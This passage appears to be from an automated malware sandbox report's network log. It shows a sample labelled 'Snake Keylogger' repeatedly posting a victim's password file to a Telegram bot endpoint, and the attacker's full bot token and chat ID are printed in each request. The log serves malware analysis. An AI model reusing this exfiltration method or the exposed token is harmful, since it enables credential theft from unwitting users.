                                                                    2022-06-26 07:34:44 UTC496OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 62 31 62 36 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ab1b686Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:44 UTC497INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:44 UTC497INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67081,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228884,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    295192.168.2.550229149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:44 UTC498OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571aed5200
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:44 UTC498OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 65 64 35 32 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571aed5200Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:45 UTC498INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:45 UTC499INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67082,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    296192.168.2.550230149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:45 UTC499OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571b3739f6
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:45 UTC500OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 33 37 33 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571b3739f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:45 UTC500INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:45 UTC501INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67083,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    297192.168.2.550231149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:45 UTC501OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571b7072c5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:45 UTC501OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 37 30 37 32 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571b7072c5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:45 UTC502INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:45 UTC502INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67084,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    298192.168.2.550232149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:46 UTC503OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ba9ab98
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:46 UTC503OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 61 39 61 62 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ba9ab98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:46 UTC504INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:46 UTC504INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67085,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228886,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    299192.168.2.550233149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:46 UTC504OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571be54603
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:46 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 65 35 34 36 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571be54603Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:46 UTC505INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:46 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67086,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228886,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.549771149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:39 UTC5OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d4fa25d0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:39 UTC5OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 66 61 32 35 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d4fa25d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:39 UTC5INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:39 UTC6INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66749,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228759,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    30192.168.2.549799149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:50 UTC50OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756db96eb51
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
